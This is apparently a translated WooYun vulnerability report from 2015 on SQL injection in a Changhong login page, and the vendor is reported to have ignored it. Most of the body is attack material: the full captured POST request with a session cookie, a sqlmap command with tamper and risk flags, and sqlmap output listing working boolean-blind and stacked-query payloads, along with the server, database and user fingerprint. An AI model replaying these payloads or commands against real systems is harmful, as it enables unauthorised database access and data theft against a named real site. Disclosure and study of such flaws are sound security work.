
Vulnerability summary

Defect ID: wooyun-2015-0155168

Title: SQL injection vulnerability on a Changhong site

Vendor: changhong.com

Author: 路人甲

Submitted: 2015-11-23 11:59

Fix time: 2015-11-28 12:00

Published: 2015-11-28 12:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-11-23: Details sent to the vendor, awaiting vendor handling
2015-11-28: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /clients/login.aspx HTTP/1.1
Content-Length: 4070
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tc.changhong.com:80/
Cookie: ASP.NET_SessionId=3pykogye1imvdbdxjygoz3gu; Hm_lvt_7a757d70d9522a73fd69f3e4f68c3131=1448247718,1448247729,1448247731,1448247812; Hm_lpvt_7a757d70d9522a73fd69f3e4f68c3131=1448247812; HMACCOUNT=47526AD588A50F29
Host: tc.changhong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24ContentPlaceHolder1%24Button3=%e7%a1%ae%e5%ae%9a&ctl00%24ContentPlaceHolder1%24TextBox2=1&ctl00%24ContentPlaceHolder1%24TextBox3=1*%20&ctl00%24tb_name=mytixqnr&ctl00%24tb_pass=g00dPa%24%24w0rD&ctl00%24TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT%2bfwkSZ9Cp4Yd%2bcN6IkV%2blBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI%2bukRHnd%2bAlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP%2bq5zC%2bTCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg%3d%3d&__VIEWSTATE=[base64 __VIEWSTATE blob omitted]


sqlmap.py -r 4.txt --time-sec=10 --tamper=space2comment --level=5 --risk=3 --current-db


[Screenshot: 1.jpg]


[Screenshot: 2.jpg]


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=-8541' OR 1062=1062 AND 'XrPc'='XrPc &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=[base64 __VIEWSTATE blob omitted]
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ctl00$ContentPlaceHolder1$Button3=%e7%a1%ae%e5%ae%9a&ctl00$ContentPlaceHolder1$TextBox2=1&ctl00$ContentPlaceHolder1$TextBox3=1';WAITFOR DELAY '0:0:10'-- &ctl00$tb_name=mytixqnr&ctl00$tb_pass=g00dPa$$w0rD&ctl00$TextBox1=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAAmAcZURQnYYovcfT798MKEvjgYQvlQv2oDArr6l/nSamxT+fwkSZ9Cp4Yd+cN6IkV+lBeHpy1zt3pnzJPIgYtaru3S8pWYO1BhvsosazapYPZ9UXI7RwI+ukRHnd+AlDZ6RcyJC/7Uhv8pUuTwRcnZKCNTGu6fpAlK5HiRhQ3QX7uQuDNsn18Vb/yPhT9ZPmVqhqsP+q5zC+TCAcrBnhAXnj3k8BhAWsprzUvtt1mNSPg==&__VIEWSTATE=[base64 __VIEWSTATE blob omitted]
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
current database: 'tc_database'


A second sqlmap run, resumed from the same stored session, reported the same two injection points and the same server fingerprint as above, and additionally:
current user: 'user_tc'

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-11-28 12:00

Vendor reply:

Vulnerability rank: 4 (WooYun assessment)

Latest status:

None yet